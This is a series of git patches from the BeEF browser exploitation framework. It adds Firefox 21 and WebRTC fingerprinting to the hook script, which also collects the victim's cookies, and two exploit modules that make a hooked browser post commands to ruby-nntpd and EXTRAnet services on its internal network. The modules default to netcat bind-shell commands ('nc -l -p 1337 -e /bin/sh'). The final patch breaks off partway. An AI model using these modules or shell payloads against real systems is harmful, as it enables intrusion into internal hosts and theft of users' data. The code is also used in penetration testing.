 	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
 	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '6789'},
 	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
-	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'id', 'width'=>'200px' },
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
     ]
   end
 

From 9bac6b4fc1832af1039c71a23028953a80d7eaf9 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 24 May 2013 13:47:31 +0930
Subject: [PATCH 306/397] Add support for Firefox 21

---
 core/main/client/browser.js | 25 +++++++++++++++++++------
 1 file changed, 19 insertions(+), 6 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index a82d3df43..736b5f7b5 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -236,12 +236,20 @@ beef.browser = {
 		return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
 	},
 
+    /**
+     * Returns true if FF21
+     * @example: beef.browser.isFF21()
+     */
+    isFF21:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/21\./) != null;
+    },
+
     /**
      * Returns true if FF.
      * @example: beef.browser.isFF()
      */
     isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21();
     },
 
     /**
@@ -561,7 +569,8 @@ beef.browser = {
             FF17:this.isFF17(), // Firefox 17
             FF18:this.isFF18(), // Firefox 18
             FF19:this.isFF19(), // Firefox 19
-			FF20:this.isFF20(), // Firefox 20
+            FF20:this.isFF20(), // Firefox 20
+            FF21:this.isFF21(), // Firefox 21
             FF:this.isFF(), // Firefox any version
 
             IE6:this.isIE6(), // Internet Explorer 6
@@ -761,10 +770,14 @@ beef.browser = {
             return '19'
         }
         ;    // Firefox 19
-		if (this.isFF20()) {
-			return '20'
-		}
-		;	// Firefox 20
+        if (this.isFF20()) {
+            return '20'
+        }
+        ;    // Firefox 20
+        if (this.isFF21()) {
+            return '21'
+        }
+        ;    // Firefox 21
 
         if (this.isIE6()) {
             return '6'

From 717f63ff0cc974e1f1a73463dd77ef1eac387fc5 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 24 May 2013 13:50:04 +0930
Subject: [PATCH 307/397] Add ruby-nntpd Command Execution exploit module

---
 .../exploits/ruby_nntpd_cmd_exec/command.js   | 43 +++++++++++++++++++
 .../exploits/ruby_nntpd_cmd_exec/config.yaml  | 16 +++++++
 .../exploits/ruby_nntpd_cmd_exec/module.rb    | 24 +++++++++++
 3 files changed, 83 insertions(+)
 create mode 100644 modules/exploits/ruby_nntpd_cmd_exec/command.js
 create mode 100644 modules/exploits/ruby_nntpd_cmd_exec/config.yaml
 create mode 100644 modules/exploits/ruby_nntpd_cmd_exec/module.rb

diff --git a/modules/exploits/ruby_nntpd_cmd_exec/command.js b/modules/exploits/ruby_nntpd_cmd_exec/command.js
new file mode 100644
index 000000000..8ac6f5de6
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = '\r\neval `'+cmd+'`\r\nexit\r\n';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var nntpd_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(nntpd_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/config.yaml b/modules/exploits/ruby_nntpd_cmd_exec/config.yaml
new file mode 100644
index 000000000..09abcc5d0
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        ruby_nntpd_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "ruby-nntpd Command Execution"
+            description: "This module uses the 'eval' verb in ruby-nntpd 0.01dev (default port 1119) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/module.rb b/modules/exploits/ruby_nntpd_cmd_exec/module.rb
new file mode 100644
index 000000000..660076af3
--- /dev/null
+++ b/modules/exploits/ruby_nntpd_cmd_exec/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# ruby-nntpd homepage: http://code.google.com/p/ruby-nntpd/
+###
+class Ruby_nntpd_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '1119'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'nc -l -p 1337 -e /bin/sh', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end

From 018a849e14379b61962585adf1fdfa7b380a0b81 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 24 May 2013 14:01:21 +0930
Subject: [PATCH 308/397] Add 'path' argument for
 `beef.dom.createIframeIpecForm()`

---
 core/main/client/dom.js                                 | 4 ++--
 modules/exploits/groovyshell_server_cmd_exec/command.js | 2 +-
 modules/exploits/qnx_qconn_command_execution/command.js | 4 ++--
 modules/exploits/ruby_nntpd_cmd_exec/command.js         | 2 +-
 modules/ipec/inter_protocol_irc/command.js              | 4 ++--
 5 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 6725c99ad..5a515967e 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -476,11 +476,11 @@ beef.dom = {
      * @params: {String} rport: remote port
      * @params: {String} commands: protocol commands to be executed by the remote host:port service
      */
-    createIframeIpecForm: function(rhost, rport, commands){
+    createIframeIpecForm: function(rhost, rport, path, commands){
         var iframeIpec = beef.dom.createInvisibleIframe();
 
         var formIpec = document.createElement('form');
-        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+path);
         formIpec.setAttribute('method',  'POST');
         formIpec.setAttribute('enctype', 'multipart/form-data');
 
diff --git a/modules/exploits/groovyshell_server_cmd_exec/command.js b/modules/exploits/groovyshell_server_cmd_exec/command.js
index 3b8d43fd8..8f4d5f146 100644
--- a/modules/exploits/groovyshell_server_cmd_exec/command.js
+++ b/modules/exploits/groovyshell_server_cmd_exec/command.js
@@ -30,7 +30,7 @@ beef.execute(function() {
 	}
 
 	// send commands
-	var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, payload);
+	var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
 
 	// clean up
diff --git a/modules/exploits/qnx_qconn_command_execution/command.js b/modules/exploits/qnx_qconn_command_execution/command.js
index 4774eb8b4..7a5cb0290 100644
--- a/modules/exploits/qnx_qconn_command_execution/command.js
+++ b/modules/exploits/qnx_qconn_command_execution/command.js
@@ -30,12 +30,12 @@ beef.execute(function() {
 	}
 
 	// send commands
-	var qnx_iframe = beef.dom.createIframeIpecForm(rhost, rport, payload);
+	var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	// clean up
 	cleanup = function() {
-		document.body.removeChild(qnx_iframe);
+		document.body.removeChild(qnx_iframe_<%= @command_id %>);
 	}
 	setTimeout("cleanup()", timeout*1000);
 
diff --git a/modules/exploits/ruby_nntpd_cmd_exec/command.js b/modules/exploits/ruby_nntpd_cmd_exec/command.js
index 8ac6f5de6..5fcd8228d 100644
--- a/modules/exploits/ruby_nntpd_cmd_exec/command.js
+++ b/modules/exploits/ruby_nntpd_cmd_exec/command.js
@@ -30,7 +30,7 @@ beef.execute(function() {
 	}
 
 	// send commands
-	var nntpd_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, payload);
+	var nntpd_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
 
 	// clean up
diff --git a/modules/ipec/inter_protocol_irc/command.js b/modules/ipec/inter_protocol_irc/command.js
index ec6b83740..6fc2a7707 100644
--- a/modules/ipec/inter_protocol_irc/command.js
+++ b/modules/ipec/inter_protocol_irc/command.js
@@ -25,12 +25,12 @@ beef.execute(function() {
 	irc_commands    += "PRIVMSG " + channel + " :" + message + "\nQUIT\n";
 
 	// send commands
-	var irc_iframe = beef.dom.createIframeIpecForm(rhost, rport, irc_commands);
+	var irc_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", irc_commands);
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IRC command sent");
 
 	// clean up
 	cleanup = function() {
-		document.body.removeChild(irc_iframe);
+		document.body.removeChild(irc_iframe_<%= @command_id %>);
 	}
 	setTimeout("cleanup()", 15000);
 

From 0dfab0e3480a7e0b514a2b35cf9c623b8bdafd74 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 24 May 2013 16:40:02 +0930
Subject: [PATCH 309/397] Add EXTRAnet Collaboration Tool Command Execution
 exploit module

---
 modules/exploits/extract_cmd_exec/command.js  | 43 +++++++++++++++++++
 modules/exploits/extract_cmd_exec/config.yaml | 16 +++++++
 modules/exploits/extract_cmd_exec/module.rb   | 30 +++++++++++++
 3 files changed, 89 insertions(+)
 create mode 100644 modules/exploits/extract_cmd_exec/command.js
 create mode 100644 modules/exploits/extract_cmd_exec/config.yaml
 create mode 100644 modules/exploits/extract_cmd_exec/module.rb

diff --git a/modules/exploits/extract_cmd_exec/command.js b/modules/exploits/extract_cmd_exec/command.js
new file mode 100644
index 000000000..505b3656d
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var rhost   = '<%= @rhost %>'; 
+	var rport   = '<%= @rport %>';
+	var timeout = '<%= @timeout %>';
+
+	// validate payload
+	try {
+		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+		var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
+	}
+
+	// validate target details
+	if (!rport || !rhost || isNaN(rport)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
+		return;
+	}
+	if (rport > 65535 || rport < 0) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
+		return;
+	}
+
+	// send commands
+	var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(extract_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/extract_cmd_exec/config.yaml b/modules/exploits/extract_cmd_exec/config.yaml
new file mode 100644
index 000000000..47de7283a
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        extract_cmd_exec:
+            enable: true
+            category: "Exploits"
+            name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
+            description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "C"]
+                not_working: ["IE"]
diff --git a/modules/exploits/extract_cmd_exec/module.rb b/modules/exploits/extract_cmd_exec/module.rb
new file mode 100644
index 000000000..0801fe20b
--- /dev/null
+++ b/modules/exploits/extract_cmd_exec/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
+###
+# EXTRAnet Collaboration Tool (extra-ct)
+# Version: 0.5.1
+# Homepage: http://www.extra-ct.net/
+# Source: http://code.google.com/p/extra-ct/
+# Source: http://sourceforge.net/projects/extract/
+###
+class Extract_cmd_exec < BeEF::Core::Command
+
+  def self.options
+    return [
+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '10100'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end

From f90ad4a261e4e276d573f57b89ea04827ab633b0 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 24 May 2013 17:06:36 +0930
Subject: [PATCH 310/397] Add detection for WebRTC support

---
 core/main/client/browser.js                   | 105 ++++++++++--------
 core/main/handlers/browserdetails.rb          |   8 ++
 .../admin_ui/controllers/modules/modules.rb   |   1 +
 .../admin_ui/controllers/panel/panel.rb       |   2 +
 .../media/javascript/ui/panel/ZombiesMgr.js   |  18 +--
 extensions/console/lib/shellinterface.rb      |   3 +-
 6 files changed, 80 insertions(+), 57 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 736b5f7b5..4efc5d63c 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1463,63 +1463,64 @@ beef.browser = {
     getDetails:function () {
         var details = new Array();
 
-        var browser_name = beef.browser.getBrowserName();
-        var browser_version = beef.browser.getBrowserVersion();
+        var browser_name     = beef.browser.getBrowserName();
+        var browser_version  = beef.browser.getBrowserVersion();
         var browser_reported_name = beef.browser.getBrowserReportedName();
-        var page_title = (document.title) ? document.title : "Unknown";
-        var page_uri = document.location.href;
-        var page_referrer = (document.referrer) ? document.referrer : "Unknown";
-        var hostname = document.location.hostname;
-        var hostport = (document.location.port) ? document.location.port : "80";
-        var browser_plugins = beef.browser.getPlugins();
-        var date_stamp = new Date().toString();
-        var os_name = beef.os.getName();
-        var hw_name = beef.hardware.getName();
-        var cpu_type = beef.hardware.cpuType();
-        var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
+        var page_title       = (document.title) ? document.title : "Unknown";
+        var page_uri         = (document.location.href) ? document.location.href : "Unknown";
+        var page_referrer    = (document.referrer) ? document.referrer : "Unknown";
+        var hostname         = (document.location.hostname) ? document.location.hostname : "Unknown";
+        var hostport         = (document.location.port) ? document.location.port : "80";
+        var browser_plugins  = beef.browser.getPlugins();
+        var date_stamp       = new Date().toString();
+        var os_name          = beef.os.getName();
+        var hw_name          = beef.hardware.getName();
+        var cpu_type         = beef.hardware.cpuType();
+        var touch_enabled    = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
         var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
         var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
             if (value == true) return value; else if (typeof value == 'object') return value; else return;
         });
-        var screen_size = beef.browser.getScreenSize();
-        var window_size = beef.browser.getWindowSize();
-        var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
-        var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
-        var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
-        var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
-        var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
-        var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
-        var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
-        var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
-        var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
-        var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
-        var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No"; 
-        var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
-        var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
+        var screen_size      = beef.browser.getScreenSize();
+        var window_size      = beef.browser.getWindowSize();
+        var java_enabled     = (beef.browser.javaEnabled()) ?     "Yes" : "No";
+        var vbscript_enabled = (beef.browser.hasVBScript()) ?     "Yes" : "No";
+        var has_flash        = (beef.browser.hasFlash()) ?        "Yes" : "No";
+        var has_phonegap     = (beef.browser.hasPhonegap()) ?     "Yes" : "No";
+        var has_googlegears  = (beef.browser.hasGoogleGears()) ?  "Yes" : "No";
+        var has_web_socket   = (beef.browser.hasWebSocket()) ?    "Yes" : "No";
+        var has_webrtc       = (beef.browser.hasWebRTC()) ?       "Yes" : "No";
+        var has_activex      = (beef.browser.hasActiveX()) ?      "Yes" : "No";
+        var has_silverlight  = (beef.browser.hasSilverlight()) ?  "Yes" : "No";
+        var has_quicktime    = (beef.browser.hasQuickTime()) ?    "Yes" : "No";
+        var has_realplayer   = (beef.browser.hasRealPlayer()) ?   "Yes" : "No";
+        var has_wmp          = (beef.browser.hasWMP()) ?          "Yes" : "No"; 
+        var has_vlc          = (beef.browser.hasVLC()) ?          "Yes" : "No";
+        var has_foxit        = (beef.browser.hasFoxit()) ?        "Yes" : "No";
         try{
             var cookies = document.cookie;
             var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
             var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
-            if (cookies) details["Cookies"] = cookies;
-            if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
-            if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
+            if (cookies) details['Cookies'] = cookies;
+            if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
+            if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
         }catch(e){
             // the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
             // and there is no reason to read cookies at this point
-            details["Cookies"] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
-            details["hasSessionCookies"] = "No";
-            details["hasPersistentCookies"] = "No";
+            details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
+            details['hasSessionCookies'] = "No";
+            details['hasPersistentCookies'] = "No";
         }
 
-        if (browser_name) details["BrowserName"] = browser_name;
-        if (browser_version) details["BrowserVersion"] = browser_version;
-        if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name;
-        if (page_title) details["PageTitle"] = page_title;
-        if (page_uri) details["PageURI"] = page_uri;
-        if (page_referrer) details["PageReferrer"] = page_referrer;
-        if (hostname) details["HostName"] = hostname;
-        if (hostport) details["HostPort"] = hostport;
-        if (browser_plugins) details["BrowserPlugins"] = browser_plugins;
+        if (browser_name) details['BrowserName'] = browser_name;
+        if (browser_version) details['BrowserVersion'] = browser_version;
+        if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name;
+        if (page_title) details['PageTitle'] = page_title;
+        if (page_uri) details['PageURI'] = page_uri;
+        if (page_referrer) details['PageReferrer'] = page_referrer;
+        if (hostname) details['HostName'] = hostname;
+        if (hostport) details['HostPort'] = hostport;
+        if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
         if (os_name) details['OsName'] = os_name;
         if (hw_name) details['Hardware'] = hw_name;
         if (cpu_type) details['CPU'] = cpu_type;
@@ -1530,11 +1531,12 @@ beef.browser = {
         if (screen_size) details['ScreenSize'] = screen_size;
         if (window_size) details['WindowSize'] = window_size;
         if (java_enabled) details['JavaEnabled'] = java_enabled;
-        if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
-        if (has_flash) details['HasFlash'] = has_flash
-        if (has_phonegap) details['HasPhonegap'] = has_phonegap
-        if (has_web_socket) details['HasWebSocket'] = has_web_socket
-        if (has_googlegears) details['HasGoogleGears'] = has_googlegears
+        if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
+        if (has_flash) details['HasFlash'] = has_flash;
+        if (has_phonegap) details['HasPhonegap'] = has_phonegap;
+        if (has_web_socket) details['HasWebSocket'] = has_web_socket;
+        if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
+        if (has_webrtc) details['HasWebRTC'] = has_webrtc;
         if (has_activex) details['HasActiveX'] = has_activex;
         if (has_silverlight) details['HasSilverlight'] = has_silverlight;
         if (has_quicktime) details['HasQuickTime'] = has_quicktime;
@@ -1553,6 +1555,13 @@ beef.browser = {
         return !!window.ActiveXObject;
     },
 
+    /**
+     * Returns boolean value depending on whether the browser supports WebRTC
+     */
+    hasWebRTC:function () {
+        return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
+    },
+
     /**
      * Returns boolean value depending on whether the browser supports Silverlight
      */
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index ae9218d65..46a3b610d 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -255,6 +255,14 @@ module BeEF
             self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasWebRTC
+          has_webrtc = get_param(@data['results'], 'HasWebRTC')
+          if BeEF::Filters.is_valid_yes_no?(has_webrtc)
+            BD.set(session_id, 'HasWebRTC', has_webrtc)
+          else
+            self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasActiveX
           has_activex = get_param(@data['results'], 'HasActiveX')
           if BeEF::Filters.is_valid_yes_no?(has_activex)
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 3d71bc7aa..7e8f5a280 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -86,6 +86,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         ['Browser Components', 'Windows Media Player','HasWMP'],
         ['Browser Components', 'VLC',                'HasVLC'],
         ['Browser Components', 'Foxit Reader',       'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index 22eeb00b6..255deef34 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -88,6 +88,7 @@ module BeEF
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
             has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
+            has_webrtc      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
             has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
             has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
@@ -113,6 +114,7 @@ module BeEF
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
                 'has_java'        => has_java,
+                'has_webrtc'      => has_webrtc,
                 'has_activex'     => has_activex,
                 'has_silverlight' => has_silverlight,
                 'has_quicktime'   => has_quicktime,
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index d983ba4a9..edcb09c5e 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -27,10 +27,11 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
 		var has_java           = zombie_array[index]["has_java"];
+		var has_webrtc         = zombie_array[index]["has_webrtc"];
 		var has_activex        = zombie_array[index]["has_activex"];
-        var has_wmp            = zombie_array[index]["has_wmp"]; 
+		var has_wmp            = zombie_array[index]["has_wmp"]; 
 		var has_vlc            = zombie_array[index]["has_vlc"];
-        var has_foxit          = zombie_array[index]["has_foxit"];
+		var has_foxit          = zombie_array[index]["has_foxit"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
 		var has_realplayer     = zombie_array[index]["has_realplayer"];
@@ -47,14 +48,15 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-        balloon_text+= "<br/>Java: "           + has_java;
-        balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>Java: "           + has_java;
+		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
-        balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
-        balloon_text+= "<br/>VLC: "            + has_vlc;
-        balloon_text+= "<br/>Foxit: "          + has_foxit;
